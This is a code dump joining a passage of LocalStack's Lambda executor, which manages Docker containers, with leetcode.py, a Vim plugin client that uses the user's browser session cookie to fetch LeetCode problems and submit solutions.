Prepares a persistent docker container for a specific function.
:param runtime: Lamda runtime environment. python2.7, nodejs6.10, etc.
:param func_arn: The ARN of the lambda function.
:param env_vars: The environment variables for the lambda.
:param lambda_cwd: The local directory containing the code for the lambda function.
:return: ContainerInfo class containing the container name and default entry point.
"""
with self.docker_container_lock:
# Get the container name and id.
func_arn = func_details.arn()
container_name = self.get_container_name(func_arn)
docker_cmd = self._docker_cmd()
status = self.get_docker_container_status(func_arn)
LOG.debug('Priming docker container (status "%s"): %s' % (status, container_name))
docker_image = Util.docker_image_for_lambda(func_details)
rm_flag = Util.get_docker_remove_flag()
# Container is not running or doesn't exist.
if status < 1:
# Make sure the container does not exist in any form/state.
self.destroy_docker_container(func_arn)
env_vars_str = ' '.join(['-e {}={}'.format(k, cmd_quote(v)) for (k, v) in env_vars])
network = config.LAMBDA_DOCKER_NETWORK
network_str = '--network="%s"' % network if network else ''
dns = config.LAMBDA_DOCKER_DNS
dns_str = '--dns="%s"' % dns if dns else ''
mount_volume = not config.LAMBDA_REMOTE_DOCKER
lambda_cwd_on_host = Util.get_host_path_for_path_in_docker(lambda_cwd)
if (':' in lambda_cwd and '\\' in lambda_cwd):
lambda_cwd_on_host = Util.format_windows_path(lambda_cwd_on_host)
mount_volume_str = '-v "%s":/var/task' % lambda_cwd_on_host if mount_volume else ''
# Create and start the container
LOG.debug('Creating container: %s' % container_name)
cmd = (
'%s create'
' %s' # --rm flag
' --name "%s"'
' --entrypoint /bin/bash' # Load bash when it starts.
' %s'
' --interactive' # Keeps the container running bash.
' -e AWS_LAMBDA_EVENT_BODY="$AWS_LAMBDA_EVENT_BODY"'
' -e HOSTNAME="$HOSTNAME"'
' -e LOCALSTACK_HOSTNAME="$LOCALSTACK_HOSTNAME"'
' -e EDGE_PORT="$EDGE_PORT"'
' %s' # env_vars
' %s' # network
' %s' # dns
' %s'
) % (docker_cmd, rm_flag, container_name, mount_volume_str,
env_vars_str, network_str, dns_str, docker_image)
LOG.debug(cmd)
run(cmd)
if not mount_volume:
LOG.debug('Copying files to container "%s" from "%s".' % (container_name, lambda_cwd))
cmd = (
'%s cp'
' "%s/." "%s:/var/task"'
) % (docker_cmd, lambda_cwd, container_name)
LOG.debug(cmd)
run(cmd)
LOG.debug('Starting container: %s' % container_name)
cmd = '%s start %s' % (docker_cmd, container_name)
LOG.debug(cmd)
run(cmd)
# give the container some time to start up
time.sleep(1)
# Get the entry point for the image.
LOG.debug('Getting the entrypoint for image: %s' % (docker_image))
cmd = (
'%s image inspect'
' --format="{{ .Config.Entrypoint }}"'
' %s'
) % (docker_cmd, docker_image)
LOG.debug(cmd)
run_result = run(cmd)
entry_point = run_result.strip('[]\n\r ')
container_network = self.get_docker_container_network(func_arn)
LOG.debug('Using entrypoint "%s" for container "%s" on network "%s".'
% (entry_point, container_name, container_network))
return ContainerInfo(container_name, entry_point)
def destroy_docker_container(self, func_arn):
"""
Stops and/or removes a docker container for a specific lambda function ARN.
:param func_arn: The ARN of the lambda function.
:return: None
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
docker_cmd = self._docker_cmd()
# Get the container name and id.
container_name = self.get_container_name(func_arn)
if status == 1:
LOG.debug('Stopping container: %s' % container_name)
cmd = '%s stop -t0 %s' % (docker_cmd, container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
status = self.get_docker_container_status(func_arn)
if status == -1:
LOG.debug('Removing container: %s' % container_name)
cmd = '%s rm %s' % (docker_cmd, container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
def get_all_container_names(self):
"""
Returns a list of container names for lambda containers.
:return: A String[] localstack docker container names for each function.
"""
with self.docker_container_lock:
LOG.debug('Getting all lambda containers names.')
cmd = '%s ps -a --filter="name=localstack_lambda_*" --format "{{.Names}}"' % self._docker_cmd()
LOG.debug(cmd)
cmd_result = run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE).strip()
if len(cmd_result) > 0:
container_names = cmd_result.split('\n')
else:
container_names = []
return container_names
def destroy_existing_docker_containers(self):
"""
Stops and/or removes all lambda docker containers for localstack.
:return: None
"""
with self.docker_container_lock:
container_names = self.get_all_container_names()
LOG.debug('Removing %d containers.' % len(container_names))
for container_name in container_names:
cmd = '%s rm -f %s' % (self._docker_cmd(), container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
def get_docker_container_status(self, func_arn):
"""
Determine the status of a docker container.
:param func_arn: The ARN of the lambda function.
:return: 1 If the container is running,
-1 if the container exists but is not running
0 if the container does not exist.
"""
with self.docker_container_lock:
# Get the container name and id.
container_name = self.get_container_name(func_arn)
# Check if the container is already running
# Note: filtering by *exact* name using regex filter '^...$' seems unstable on some
# systems. Therefore, we use a combination of filter and grep to get the results.
cmd = ("docker ps -a --filter name='%s' "
'--format "{{ .Status }} - {{ .Names }}" '
'| grep -w "%s" | cat') % (container_name, container_name)
LOG.debug('Getting status for container "%s": %s' % (container_name, cmd))
cmd_result = run(cmd)
# If the container doesn't exist. Create and start it.
container_status = cmd_result.strip()
if len(container_status) == 0:
return 0
if container_status.lower().startswith('up '):
return 1
return -1
def get_docker_container_network(self, func_arn):
"""
Determine the network of a docker container.
:param func_arn: The ARN of the lambda function.
:return: name of the container network
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# container does not exist
if status == 0:
return ''
# Get the container name.
container_name = self.get_container_name(func_arn)
docker_cmd = self._docker_cmd()
# Get the container network
LOG.debug('Getting container network: %s' % container_name)
cmd = (
'%s inspect %s'
' --format "{{ .HostConfig.NetworkMode }}"'
) % (docker_cmd, container_name)
LOG.debug(cmd)
cmd_result = run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
container_network = cmd_result.strip()
return container_network
def idle_container_destroyer(self):
"""
Iterates though all the lambda containers and destroys any container that has
been inactive for longer than MAX_CONTAINER_IDLE_TIME_MS.
:return: None
"""
LOG.info('Checking if there are idle containers.')
current_time = int(time.time() * 1000)
for func_arn, last_run_time in dict(self.function_invoke_times).items():
duration = current_time - last_run_time
# not enough idle time has passed
if duration < MAX_CONTAINER_IDLE_TIME_MS:
continue
# container has been idle, destroy it.
self.destroy_docker_container(func_arn)
def start_idle_container_destroyer_interval(self):
"""
Starts a repeating timer that triggers start_idle_container_destroyer_interval every 60 seconds.
Thus checking for idle containers and destroying them.
:return: None
"""
self.idle_container_destroyer()
threading.Timer(60.0, self.start_idle_container_destroyer_interval).start()
def get_container_name(self, func_arn):
"""
Given a function ARN, returns a valid docker container name.
:param func_arn: The ARN of the lambda function.
:return: A docker compatible name for the arn.
"""
return 'localstack_lambda_' + re.sub(r'[^a-zA-Z0-9_.-]', '_', func_arn)
class LambdaExecutorSeparateContainers(LambdaExecutorContainers):
def __init__(self):
super(LambdaExecutorSeparateContainers, self).__init__()
self.max_port = LAMBDA_API_UNIQUE_PORTS
self.port_offset = LAMBDA_API_PORT_OFFSET
def prepare_event(self, environment, event_body):
# Tell Lambci to use STDIN for the event
environment['DOCKER_LAMBDA_USE_STDIN'] = '1'
return event_body.encode()
def prepare_execution(self, func_details, env_vars, command):
lambda_cwd = func_details.cwd
handler = func_details.handler
entrypoint = ''
if command:
entrypoint = ' --entrypoint ""'
elif handler:
command = '"%s"' % handler
else:
command = ''
# add Docker Lambda env vars
network = config.LAMBDA_DOCKER_NETWORK
network_str = '--network="%s"' % network if network else ''
if network == 'host':
port = get_free_tcp_port()
env_vars['DOCKER_LAMBDA_API_PORT'] = port
env_vars['DOCKER_LAMBDA_RUNTIME_PORT'] = port
dns = config.LAMBDA_DOCKER_DNS
dns_str = '--dns="%s"' % dns if dns else ''
env_vars_string = ' '.join(['-e {}="${}"'.format(k, k) for (k, v) in env_vars.items()])
debug_docker_java_port = '-p {p}:{p}'.format(p=Util.debug_java_port) if Util.debug_java_port else ''
docker_cmd = self._docker_cmd()
docker_image = Util.docker_image_for_lambda(func_details)
rm_flag = Util.get_docker_remove_flag()
if config.LAMBDA_REMOTE_DOCKER:
cp_cmd = '%s cp "%s/." "$CONTAINER_ID:/var/task";' % (docker_cmd, lambda_cwd) if lambda_cwd else ''
cmd = (
'CONTAINER_ID="$(%s create -i'
' %s' # entrypoint
' %s' # debug_docker_java_port
' %s' # env
' %s' # network
' %s' # dns
' %s' # --rm flag
' %s %s' # image and command
')";'
'%s '
'%s start -ai "$CONTAINER_ID";'
) % (docker_cmd, entrypoint, debug_docker_java_port,
env_vars_string, network_str, dns_str, rm_flag,
docker_image, command,
cp_cmd,
docker_cmd)
else:
mount_flag = ''
if lambda_cwd:
mount_flag = '-v "%s":/var/task' % Util.get_host_path_for_path_in_docker(lambda_cwd)
cmd = (
'%s run -i'
' %s'
' %s' # code mount
' %s'
' %s' # network
' %s' # dns
' %s' # --rm flag
' %s %s'
) % (docker_cmd, entrypoint, mount_flag, env_vars_string,
network_str, dns_str, rm_flag, docker_image, command)
return cmd
class LambdaExecutorLocal(LambdaExecutor):
def _execute(self, func_arn, func_details, event, context=None, version=None):
lambda_cwd = func_details.cwd
environment = self._prepare_environment(func_details)
# execute the Lambda function in a forked sub-process, sync result via queue
queue = Queue()
lambda_function = func_details.function(version)
def do_execute():
# now we're executing in the child process, safe to change CWD and ENV
path_before = sys.path
result = None
try:
if lambda_cwd:
os.chdir(lambda_cwd)
sys.path = [lambda_cwd] + sys.path
if environment:
os.environ.update(environment)
result = lambda_function(event, context)
except Exception as e:
result = str(e)
sys.stderr.write('%s %s' % (e, traceback.format_exc()))
raise
finally:
sys.path = path_before
queue.put(result)
process = Process(target=do_execute)
start_time = now(millis=True)
error = None
with CaptureOutput() as c:
try:
process.run()
except Exception as e:
error = e
result = queue.get()
end_time = now(millis=True)
# Make sure to keep the log line below, to ensure the log stream gets created
request_id = long_uid()
log_output = 'START %s: Lambda %s started via "local" executor ...' % (request_id, func_arn)
# TODO: Interweaving stdout/stderr currently not supported
for stream in (c.stdout(), c.stderr()):
if stream:
log_output += ('\n' if log_output else '') + stream
log_output += '\nEND RequestId: %s' % request_id
log_output += '\nREPORT RequestId: %s Duration: %s ms' % (request_id, int((end_time - start_time) * 1000))
# store logs to CloudWatch
_store_logs(func_details, log_output)
result = result.result if isinstance(result, InvocationResult) else result
if error:
LOG.info('Error executing Lambda "%s": %s %s' % (func_arn, error,
''.join(traceback.format_tb(error.__traceback__))))
raise InvocationException(result, log_output)
invocation_result = InvocationResult(result, log_output=log_output)
return invocation_result
def execute_java_lambda(self, event, context, main_file, func_details=None):
handler = func_details.handler
opts = config.LAMBDA_JAVA_OPTS if config.LAMBDA_JAVA_OPTS else ''
event_file = EVENT_FILE_PATTERN.replace('*', short_uid())
save_file(event_file, json.dumps(json_safe(event)))
TMP_FILES.append(event_file)
class_name = handler.split('::')[0]
classpath = '%s:%s:%s' % (main_file, Util.get_java_classpath(main_file), LAMBDA_EXECUTOR_JAR)
cmd = 'java %s -cp %s %s %s %s' % (opts, classpath, LAMBDA_EXECUTOR_CLASS, class_name, event_file)
LOG.warning(cmd)
result = self.run_lambda_executor(cmd, func_details=func_details)
return result
class Util:
debug_java_port = False
@classmethod
def get_java_opts(cls):
opts = config.LAMBDA_JAVA_OPTS or ''
# Replace _debug_port_ with a random free port
if '_debug_port_' in opts:
if not cls.debug_java_port:
cls.debug_java_port = get_free_tcp_port()
opts = opts.replace('_debug_port_', ('%s' % cls.debug_java_port))
else:
# Parse the debug port from opts
m = re.match('.*address=(.+:)?(\\d+).*', opts)
if m is not None:
cls.debug_java_port = m.groups()[1]
return opts
@classmethod
def get_host_path_for_path_in_docker(cls, path):
return re.sub(r'^%s/(.*)$' % config.TMP_FOLDER,
r'%s/\1' % config.HOST_TMP_FOLDER, path)
@classmethod
def format_windows_path(cls, path):
temp = path.replace(':', '').replace('\\', '/')
if len(temp) >= 1 and temp[:1] != '/':
temp = '/' + temp
temp = '%s%s' % (config.WINDOWS_DOCKER_MOUNT_PREFIX, temp)
return temp
@classmethod
def docker_image_for_lambda(cls, func_details):
runtime = func_details.runtime or ''
docker_tag = runtime
docker_image = config.LAMBDA_CONTAINER_REGISTRY
# TODO: remove prefix once execution issues are fixed with dotnetcore/python lambdas
# See https://github.com/lambci/docker-lambda/pull/218
lambdas_to_add_prefix = ['dotnetcore2.0', 'dotnetcore2.1', 'python2.7', 'python3.6', 'python3.7']
if docker_image == 'lambci/lambda' and any(img in docker_tag for img in lambdas_to_add_prefix):
docker_tag = '20191117-%s' % docker_tag
return '"%s:%s"' % (docker_image, docker_tag)
@classmethod
def get_docker_remove_flag(cls):
return '--rm' if config.LAMBDA_REMOVE_CONTAINERS else ''
@classmethod
def get_java_classpath(cls, archive):
"""
Return the Java classpath, using the parent folder of the
given archive as the base folder.
The result contains any *.jar files in the base folder, as
well as any JAR files in the "lib/*" subfolder living
alongside the supplied java archive (.jar or .zip).
:param archive: an absolute path to a .jar or .zip Java archive
:return: the Java classpath, relative to the base dir of "archive"
"""
entries = ['.']
base_dir = os.path.dirname(archive)
for pattern in ['%s/*.jar', '%s/lib/*.jar', '%s/java/lib/*.jar', '%s/*.zip']:
for entry in glob.glob(pattern % base_dir):
if os.path.realpath(archive) != os.path.realpath(entry):
entries.append(os.path.relpath(entry, base_dir))
# make sure to append the localstack-utils.jar at the end of the classpath
# https://github.com/localstack/localstack/issues/1160
entries.append(os.path.relpath(archive, base_dir))
entries.append('*.jar')
entries.append('java/lib/*.jar')
result = ':'.join(entries)
return result
# --------------
# GLOBAL STATE
# --------------
EXECUTOR_LOCAL = LambdaExecutorLocal()
EXECUTOR_CONTAINERS_SEPARATE = LambdaExecutorSeparateContainers()
EXECUTOR_CONTAINERS_REUSE = LambdaExecutorReuseContainers()
DEFAULT_EXECUTOR = EXECUTOR_CONTAINERS_SEPARATE
# the keys of AVAILABLE_EXECUTORS map to the LAMBDA_EXECUTOR config variable
AVAILABLE_EXECUTORS = {
'local': EXECUTOR_LOCAL,
'docker': EXECUTOR_CONTAINERS_SEPARATE,
'docker-reuse': EXECUTOR_CONTAINERS_REUSE
}
|
leetcode.py
|
import json
import logging
import re
import time
import os
import pickle
from threading import Semaphore, Thread, current_thread
try:
from bs4 import BeautifulSoup
import requests
inited = 1
except ImportError:
inited = 0
try:
import vim
except ImportError:
vim = None
try:
import browser_cookie3
except ImportError:
browser_cookie3 = None
try:
import keyring
except ImportError:
keyring = None
LC_BASE = os.environ['LEETCODE_BASE_URL']
LC_CSRF = LC_BASE + '/ensure_csrf/'
LC_LOGIN = LC_BASE + '/accounts/login/'
LC_GRAPHQL = LC_BASE + '/graphql'
LC_CATEGORY_PROBLEMS = LC_BASE + '/api/problems/{category}'
LC_PROBLEM = LC_BASE + '/problems/{slug}/description'
LC_TEST = LC_BASE + '/problems/{slug}/interpret_solution/'
LC_SUBMIT = LC_BASE + '/problems/{slug}/submit/'
LC_SUBMISSIONS = LC_BASE + '/api/submissions/{slug}'
LC_SUBMISSION = LC_BASE + '/submissions/detail/{submission}/'
LC_CHECK = LC_BASE + '/submissions/detail/{submission}/check/'
LC_PROBLEM_SET_ALL = LC_BASE + '/problemset/all/'
LC_PROGRESS_ALL = LC_BASE + '/api/progress/all/'
EMPTY_FREQUENCIES = [0, 0, 0, 0, 0, 0, 0, 0]
session = None
task_running = False
task_done = False
task_trigger = Semaphore(0)
task_name = ''
task_input = None
task_progress = ''
task_output = None
task_err = ''
log = logging.getLogger(__name__)
log.setLevel(logging.ERROR)
def enable_logging():
out_hdlr = logging.FileHandler('leetcode-vim.log')
out_hdlr.setFormatter(logging.Formatter('%(asctime)s %(message)s'))
out_hdlr.setLevel(logging.INFO)
log.addHandler(out_hdlr)
log.setLevel(logging.INFO)
def _make_headers():
assert is_login()
headers = {'Origin': LC_BASE,
'Referer': LC_BASE,
'X-Requested-With': 'XMLHttpRequest',
'X-CSRFToken': session.cookies.get('csrftoken', '')}
return headers
def _level_to_name(level):
if level == 1:
return 'Easy'
if level == 2:
return 'Medium'
if level == 3:
return 'Hard'
return ' '
def _state_to_flag(state):
if state == 'ac':
return 'X'
if state == 'notac':
return '?'
return ' '
def _status_to_name(status):
if status == 10:
return 'Accepted'
if status == 11:
return 'Wrong Answer'
if status == 12:
return 'Memory Limit Exceeded'
if status == 13:
return 'Output Limit Exceeded'
if status == 14:
return 'Time Limit Exceeded'
if status == 15:
return 'Runtime Error'
if status == 16:
return 'Internal Error'
if status == 20:
return 'Compile Error'
if status == 21:
return 'Unknown Error'
return 'Unknown State'
def _break_code_lines(s):
return s.replace('\r\n', '\n').replace('\xa0', ' ').split('\n')
def _break_paragraph_lines(s):
lines = _break_code_lines(s)
result = []
# reserve one and only one empty line between two non-empty lines
for line in lines:
if line.strip() != '': # a line with only whitespaces is also empty
result.append(line)
result.append('')
return result
def _remove_description(code):
eod = code.find('[End of Description]')
if eod == -1:
return code
eol = code.find('\n', eod)
if eol == -1:
return ''
return code[eol+1:]
def is_login():
return session and 'LEETCODE_SESSION' in session.cookies
def get_progress():
headers = _make_headers()
res = session.get(LC_PROGRESS_ALL, headers=headers)
if res.status_code != 200:
_echoerr('cannot get the progress')
return None
data = res.json()
if 'solvedTotal' not in data:
return None
return data
def load_session_cookie(browser):
if browser_cookie3 is None:
_echoerr('browser_cookie3 not installed: pip3 install browser_cookie3 --user')
return False
if keyring is None:
_echoerr('keyring not installed: pip3 install keyring --user')
return False
session_cookie_raw = keyring.get_password('leetcode.vim', 'SESSION_COOKIE')
if session_cookie_raw is None:
cookies = getattr(browser_cookie3, browser)(domain_name=LC_BASE.split('/')[-1])
for cookie in cookies:
if cookie.name == 'LEETCODE_SESSION':
session_cookie = cookie
session_cookie_raw = pickle.dumps(cookie, protocol=0).decode('utf-8')
break
else:
_echoerr('Leetcode session cookie not found. Please login in browser.')
return False
keyring.set_password('leetcode.vim', 'SESSION_COOKIE', session_cookie_raw)
else:
session_cookie = pickle.loads(session_cookie_raw.encode('utf-8'))
global session
session = requests.Session()
session.cookies.set_cookie(session_cookie)
progress = get_progress()
if progress is None:
_echoerr('cannot get progress. Please relogin in your browser.')
keyring.delete_password('leetcode.vim', 'SESSION_COOKIE')
return False
return True
def _get_category_problems(category):
headers = _make_headers()
url = LC_CATEGORY_PROBLEMS.format(category=category)
log.info('_get_category_problems request: url="%s" headers="%s"',
url, headers)
res = session.get(url, headers=headers)
log.info('_get_category_problems response: status="%s" body="%s"',
res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot get the category: {}'.format(category))
return []
problems = []
content = res.json()
for p in content['stat_status_pairs']:
# skip hidden questions
if p['stat']['question__hide']:
continue
problem = {'state': _state_to_flag(p['status']),
'id': p['stat']['question_id'],
'fid': p['stat']['frontend_question_id'],
'title': p['stat']['question__title'],
'slug': p['stat']['question__title_slug'],
'paid_only': p['paid_only'],
'ac_rate': p['stat']['total_acs'] / p['stat']['total_submitted'],
'level': _level_to_name(p['difficulty']['level']),
'favor': p['is_favor'],
'category': content['category_slug'],
'frequency': p['frequency']}
problems.append(problem)
return problems
def get_problems(categories):
assert is_login()
problems = []
for c in categories:
problems.extend(_get_category_problems(c))
return sorted(problems, key=lambda p: p['id'])
def _split(s):
if isinstance(s, list):
lines = []
for element in s:
lines.extend(_split(element))
return lines
# Replace all \r\n to \n and all \r (alone) to \n
s = s.replace('\r\n', '\n').replace('\r', '\n').replace('\0', '\n')
# str.split has an disadvantage that ''.split('\n') results in [''], but what we want
# is []. This small function returns [] if `s` is a blank string, that is, containing no
# characters other than whitespaces.
if s.strip() == '':
return []
return s.split('\n')
def get_problem(slug):
assert is_login()
headers = _make_headers()
headers['Referer'] = LC_PROBLEM.format(slug=slug)
body = {'query': '''query getQuestionDetail($titleSlug : String!) {
question(titleSlug: $titleSlug) {
questionId
title
content
stats
difficulty
codeDefinition
sampleTestCase
enableRunCode
translatedContent
}
}''',
'variables': {'titleSlug': slug},
'operationName': 'getQuestionDetail'}
log.info('get_problem request: url="%s" headers="%s" body="%s"', LC_GRAPHQL, headers, body)
res = session.post(LC_GRAPHQL, json=body, headers=headers)
log.info('get_problem response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot get the problem: {}'.format(slug))
return None
q = res.json()['data']['question']
content = q['translatedContent'] or q['content']
if content is None:
_echoerr('cannot get the problem: {}'.format(slug))
return None
soup = BeautifulSoup(content, features='html.parser')
problem = {}
problem['id'] = q['questionId']
problem['title'] = q['title']
problem['slug'] = slug
problem['level'] = q['difficulty']
problem['desc'] = _break_paragraph_lines(soup.get_text())
problem['templates'] = {}
for t in json.loads(q['codeDefinition']):
problem['templates'][t['value']] = _break_code_lines(t['defaultCode'])
problem['testable'] = q['enableRunCode']
problem['testcase'] = _split(q['sampleTestCase'])
stats = json.loads(q['stats'])
problem['total_accepted'] = stats['totalAccepted']
problem['total_submission'] = stats['totalSubmission']
problem['ac_rate'] = stats['acRate']
return problem
def _check_result(submission_id):
global task_progress
if _in_task():
prog_stage = 'Uploading '
prog_bar = '.'
task_progress = prog_stage + prog_bar
while True:
headers = _make_headers()
url = LC_CHECK.format(submission=submission_id)
log.info('check result request: url="%s" headers="%s"', url, headers)
res = session.get(url, headers=headers)
log.info('check result response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot get the execution result')
return None
if _in_task():
prog_bar += '.'
r = res.json()
if r['state'] == 'SUCCESS':
prog_stage = 'Done '
break
elif r['state'] == 'PENDING':
prog_stage = 'Pending '
elif r['state'] == 'STARTED':
prog_stage = 'Running '
if _in_task():
task_progress = prog_stage + prog_bar
time.sleep(1)
result = {
'answer': r.get('code_answer', []),
'runtime': r['status_runtime'],
'state': _status_to_name(r['status_code']),
'testcase': _split(r.get('input', r.get('last_testcase', ''))),
'passed': r.get('total_correct') or 0,
'total': r.get('total_testcases') or 0,
'error': _split([v for k, v in r.items() if 'error' in k and v])
}
# the keys differs between the result of testing the code and submitting it
# for submission judge_type is 'large', and for testing judge_type does not exist
if r.get('judge_type') == 'large':
result['answer'] = _split(r.get('code_output', ''))
result['expected_answer'] = _split(r.get('expected_output', ''))
result['stdout'] = _split(r.get('std_output', ''))
result['runtime_percentile'] = r.get('runtime_percentile', '')
else:
# Test states cannot distinguish accepted answers from wrong answers.
if result['state'] == 'Accepted':
result['state'] = 'Finished'
result['stdout'] = _split(r.get('code_output', []))
result['expected_answer'] = []
result['runtime_percentile'] = r.get('runtime_percentile', '')
result['expected_answer'] = r.get('expected_code_answer', [])
return result
def test_solution(problem_id, title, slug, filetype, code, test_input):
assert is_login()
code = _remove_description(code)
headers = _make_headers()
headers['Referer'] = LC_PROBLEM.format(slug=slug)
body = {'data_input': test_input,
'lang': filetype,
'question_id': str(problem_id),
'test_mode': False,
'typed_code': code}
url = LC_TEST.format(slug=slug)
log.info('test solution request: url="%s" headers="%s" body="%s"', url, headers, body)
res = session.post(url, json=body, headers=headers)
log.info('test solution response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
if 'too fast' in res.text:
_echoerr('you are sending the request too fast')
else:
_echoerr('cannot test the solution for ' + slug)
return None
result = _check_result(res.json()['interpret_id'])
result['testcase'] = test_input.split('\n')
result['title'] = title
return result
def test_solution_async(problem_id, title, slug, filetype, code, test_input):
assert is_login()
global task_input, task_name
if task_running:
_echoerr('there is other task running: ' + task_name)
return False
code = _remove_description(code)
task_name = 'test_solution'
task_input = [problem_id, title, slug, filetype, code, test_input]
task_trigger.release()
return True
def submit_solution(slug, filetype, code=None):
assert is_login()
problem = get_problem(slug)
if not problem:
return None
if code is None:
code = '\n'.join(vim.current.buffer)
code = _remove_description(code)
headers = _make_headers()
headers['Referer'] = LC_PROBLEM.format(slug=slug)
body = {'data_input': problem['testcase'],
'lang': filetype,
'question_id': str(problem['id']),
'test_mode': False,
'typed_code': code,
'judge_type': 'large'}
url = LC_SUBMIT.format(slug=slug)
log.info('submit solution request: url="%s" headers="%s" body="%s"', url, headers, body)
res = session.post(url, json=body, headers=headers)
log.info('submit solution response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
if 'too fast' in res.text:
_echoerr('you are sending the request too fast')
else:
_echoerr('cannot submit the solution for ' + slug)
return None
result = _check_result(res.json()['submission_id'])
result['title'] = problem['title']
return result
def submit_solution_async(slug, filetype, code=None):
assert is_login()
global task_input, task_name
if task_running:
_echoerr('there is other task running: ' + task_name)
return False
if code is None:
code = '\n'.join(vim.current.buffer)
task_name = 'submit_solution'
task_input = [slug, filetype, code]
task_trigger.release()
return True
def get_submissions(slug):
assert is_login()
headers = _make_headers()
headers['Referer'] = LC_PROBLEM.format(slug=slug)
url = LC_SUBMISSIONS.format(slug=slug)
log.info('get submissions request: url="%s" headers="%s"', url, headers)
res = session.get(url, headers=headers)
log.info('get submissions response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot find the submissions of problem: ' + slug)
return None
submissions = []
for r in res.json()['submissions_dump']:
s = {
'id': r['url'].split('/')[3],
'time': r['time'].replace('\xa0', ' '),
'status': r['status_display'],
'runtime': r['runtime'],
}
submissions.append(s)
return submissions
def _group1(match, default):
if match:
return match.group(1)
return default
def _unescape(s):
return s.encode().decode('unicode_escape')
def get_submission(sid):
assert is_login()
headers = _make_headers()
url = LC_SUBMISSION.format(submission=sid)
log.info('get submission request: url="%s" headers="%s"', url, headers)
res = session.get(url, headers=headers)
log.info('get submission response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot find the submission: ' + sid)
return None
# we need to parse the data from the Javascript snippet
s = res.text
submission = {
'id': sid,
'state': _status_to_name(int(_group1(re.search(r"status_code: parseInt\('([^']*)'", s),
'not found'))),
'runtime': _group1(re.search("runtime: '([^']*)'", s), 'not found'),
'passed': _group1(re.search("total_correct : '([^']*)'", s), 'not found'),
'total': _group1(re.search("total_testcases : '([^']*)'", s), 'not found'),
'testcase': _split(_unescape(_group1(re.search("input : '([^']*)'", s), ''))),
'answer': _split(_unescape(_group1(re.search("code_output : '([^']*)'", s), ''))),
'expected_answer': _split(_unescape(_group1(re.search("expected_output : '([^']*)'", s),
''))),
'problem_id': _group1(re.search("questionId: '([^']*)'", s), 'not found'),
'slug': _group1(re.search("editCodeUrl: '([^']*)'", s), '///').split('/')[2],
'filetype': _group1(re.search("getLangDisplay: '([^']*)'", s), 'not found'),
'error': [],
'stdout': [],
}
problem = get_problem(submission['slug'])
submission['title'] = problem['title']
# the punctuations and newlines in the code are escaped like '\\u0010' ('\\' => real backslash)
# to unscape the string, we do the trick '\\u0010'.encode().decode('unicode_escape') ==> '\n'
submission['code'] = _break_code_lines(_unescape(_group1(
re.search("submissionCode: '([^']*)'", s), '')))
dist_str = _unescape(_group1(re.search("runtimeDistributionFormatted: '([^']*)'", s),
'{"distribution":[]}'))
dist = json.loads(dist_str)['distribution']
dist.reverse()
# the second key "runtime" is the runtime in milliseconds
# we need to search from the position after the first "runtime" key
prev_runtime = re.search("runtime: '([^']*)'", s)
if not prev_runtime:
my_runtime = 0
else:
my_runtime = int(_group1(re.search("runtime: '([^']*)'", s[prev_runtime.end():]), 0))
accum = 0
for runtime, frequency in dist:
accum += frequency
if my_runtime >= int(runtime):
break
submission['runtime_percentile'] = '{:.1f}%'.format(accum)
return submission
def _process_topic_element(topic):
return {'topic_name': topic.find(class_='text-gray').string.strip(),
'num_problems': topic.find(class_='badge').string,
'topic_slug': topic.get('href').split('/')[2]}
def _process_company_element(company):
return {'company_name': company.find(class_='text-gray').string.strip(),
'num_problems': company.find(class_='badge').string,
'company_slug': company.get('href').split('/')[2]}
def get_topics_and_companies():
headers = _make_headers()
log.info('get_topics_and_companies request: url="%s', LC_PROBLEM_SET_ALL)
res = session.get(LC_PROBLEM_SET_ALL, headers=headers)
log.info('get_topics_and_companies response: status="%s" body="%s"', res.status_code,
res.text)
if res.status_code != 200:
_echoerr('cannot get topics')
return []
soup = BeautifulSoup(res.text, features='html.parser')
topic_elements = soup.find_all(class_='sm-topic')
topics = [_process_topic_element(topic) for topic in topic_elements]
company_elements = soup.find_all(class_='sm-company')
companies = [_process_company_element(company) for company in company_elements]
return {
'topics': topics,
'companies': companies
}
def get_problems_of_topic(topic_slug):
request_body = {
'operationName':'getTopicTag',
'variables': {'slug': topic_slug},
'query': '''query getTopicTag($slug: String!) {
topicTag(slug: $slug) {
name
translatedName
questions {
status
questionId
questionFrontendId
title
titleSlug
translatedTitle
stats
difficulty
isPaidOnly
}
frequencies
}
}
'''}
headers = _make_headers()
log.info('get_problems_of_topic request: headers="%s" body="%s"', headers,
request_body)
res = session.post(LC_GRAPHQL, headers=headers, json=request_body)
log.info('get_problems_of_topic response: status="%s" body="%s"',
res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot get problems of the topic')
return {'topic_name': topic_slug, 'problems': []}
topic_tag = res.json()['data']['topicTag']
if not topic_tag:
return {'topic_name': topic_slug, 'problems': []}
if topic_tag['frequencies']:
id_to_frequency_map = json.loads(topic_tag['frequencies'])
else:
id_to_frequency_map = {}
def process_problem(p):
stats = json.loads(p['stats'])
return {
'state': _state_to_flag(p['status']),
'id': p['questionId'],
'fid': p['questionFrontendId'],
'title': p['title'],
'slug': p['titleSlug'],
'paid_only': p['isPaidOnly'],
'ac_rate': stats['totalAcceptedRaw'] / stats['totalSubmissionRaw'],
'level': p['difficulty'],
'favor': False,
'frequency': id_to_frequency_map.get(p['questionId'], 0)}
return {
'topic_name': topic_tag['name'],
'problems': [process_problem(p) for p in topic_tag['questions']]}
def get_problems_of_company(company_slug):
request_body = {
'operationName':'getCompanyTag',
'variables': {'slug': company_slug},
